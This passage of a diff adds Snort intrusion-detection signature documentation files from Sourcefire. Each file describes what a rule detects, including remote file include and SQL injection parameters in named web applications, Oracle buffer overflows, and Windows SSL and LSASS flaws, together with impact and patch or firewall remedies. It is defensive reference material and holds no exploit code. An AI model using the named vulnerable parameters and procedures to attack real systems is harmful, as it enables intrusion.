+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-Cert:
+http://www.kb.cert.org/vuls/id/150236
+
+--
--- /dev/null
+++ b/doc/signatures/100000416.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000416
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MyBloggie" application running on a webserver. Access to the file "admin.php" using a remote file being passed as the "mybloggie_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mybloggie_root_path" parameter in the "admin.php" script used by the "MyBloggie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyBloggie
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/708.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid: 708
+
+-- 
+
+Summary: 
+This event is generated when an attempt is made to overflow a buffer in the Microsoft SQL Server and Data Engine.
+
+-- 
+Impact: 
+Serious. A Denial of Service condition or execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A buffer overflow condition exists in some versions of Microsoft SQL Server and Data Engine that may allow an attacker to execute arbitrary code with system privileges or crash the SQL Server.
+
+The attacker must gain access to the SQL Server to exploit this vulnerability.
+
+--
+
+Attack Scenarios: 
+Exploit code exists.
+
+-- 
+
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+
+False Positives: 
+None Known.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1082
+
+Bugtraq:
+http://www.securityfocus.com/bid/2031
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/ms00-092.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1520.txt
@@ -0,0 +1,90 @@
+Rule:  
+
+--
+Sid:
+1520
+
+--
+Summary:
+This event is generated when an attempt is made to access server-info.
+Using the Apache webserver, this url is generally handled by the
+mod_info module, which will happily disclose valuable information about
+your webserver which may aid in their attack.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+The mod_info module "provides a comprehensive overview of the server
+configuration including all installed modules and directives in the
+configuration files" for the Apache webserver.  Successfully accessing the url
+that is handle by mod_info may give an attacker valuable information about
+the server.
+
+If mod_info is in use and the attacking host is allowed to access it,
+every possible configuration option that the Apache server is using can
+be viewed. This includes ACLs, modules, file and directory names, and
+other valuable information that will help an attacker determine ways of
+attacking the server.
+
+--
+Affected Systems:
+	Apache webservers with mod_info enabled.
+ 
+--
+Attack Scenarios:
+As part of an attack against an Apache webserver, an attacker may try to
+access "/server-info" which is typically handled by the mod_info module.  If
+sucessful, this will give valuable information about the webserver for
+use in further attacks. 
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+Few, but certainly possible.  Since this rule only checks for the
+existance of "/server-info" in the url, any url containing that string will
+trigger this rule.  A few common false positives may include urls like:
+
+http://victim/server-info/contact.html
+http://victim/really/long/directory/server-info.html
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if server-info exists on the victim in question, and if the attacker
+is allowed to access it.
+
+If mod_info is necessary on this server, consider restricting access to
+it via Apache directives, i.e.:
+
+<Location /server-info>
+    SetHandler server-info
+    Order deny,allow
+    Deny from all
+    Allow from .yourdomain.net
+</Location>
+
+
+--
+Contributors:
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+Apache:
+http://httpd.apache.org/docs/mod/mod_info.html
+
+--
--- /dev/null
+++ b/doc/signatures/2724.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2724
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_date
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/391.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+391
+
+--
+
+Summary:
+This event is generated when an ICMP Alternate Host Address datagram is detected on the network with an invalid ICMP code.  This ICMP Type is not documented in an RFC, but may be implemented by routing equipment to direct hosts to the correct IP address of neighboring hosts.
+
+--
+
+Impact:
+This ICMP Type is not implemented in most standard operating systems and is a potential indication of information gathering activities.
+
+--
+
+Detailed Information:
+ICMP Type 6 (Alternate Host Address)  is not defined in an RFC and should not be considered legitimate network traffic.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the network.
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Alternate Host Address datagrams with invalid ICMP codes.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 6 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2124.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2124
+
+--
+Summary:
+This event is generated when an attempt is made to connect to a host running a Remote PC Access Server. 
+
+--
+Impact:
+Serious. System compromise leading to a compromise of all data on the target host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to connect to a host using the Remote PC Access Server. This event may also be generated by an attacker using Nessus to scan for Remote PC Access. 
+
+Remote PC is used to remotely administer hosts via the Internet. It offers complete control of the client machine via a TCP connection.
+
+Login information is transmitted in clear text across a TCP connection, the attacker could recover this information by capturing a legitimate session. It may also be possible for an attacker to gain access by utilizing a brute force attack to discover the password to connect.
+
+--
+Affected Systems:
+Any host using the Remote PC Access Server.
+
+--
+Attack Scenarios:
+An attacker can connect to the Remote PC Access Server using the client program and gain complete control of the host if the password and username are known.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate login session may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable the Remote PC Access Server
+
+Disallow connection to the server from clients external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/427.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+427
+
+--
+
+Summary:
+This event is generated when a router generates and ICMP Parameter Problem Unspecified Error datagram.
+
+--
+
+Impact:
+This could be an indication of a protocol error by a previous hop router.  Normally this datagram would only be generated with the datagram was truncated or damaged before it reached its final destination.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 Code 0 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/1213.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1213
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000629.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000629
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_view.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_view.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1686.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1686
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2822.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2822
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure publish_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000556.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000556
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "sid" parameter in the "error.php" script used 
+by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2623.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2623
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "create_snapshot_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the first variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000701.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000701
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "WordPress" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "paged" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "paged" parameter in the "index.php" script used by the "WordPress" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WordPress
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1574.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1574
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/809.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+809
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2525.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2525
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2157.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 2157
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the administration interface of IISProtect on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the administration interface of IISProtect on a host running Microsoft Internet Information Server (IIS).
+
+The attacker can gain administrator access to the web server running IISProtect without the need to authenticate.
+
+--
+Affected Systems:
+Any host using IISProtect.
+
+--
+Attack Scenarios:
+An attacker can gain control of the web server without the need to authenticate.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000377.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000377
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_forum_prune.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_forum_prune.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1489.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1489
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
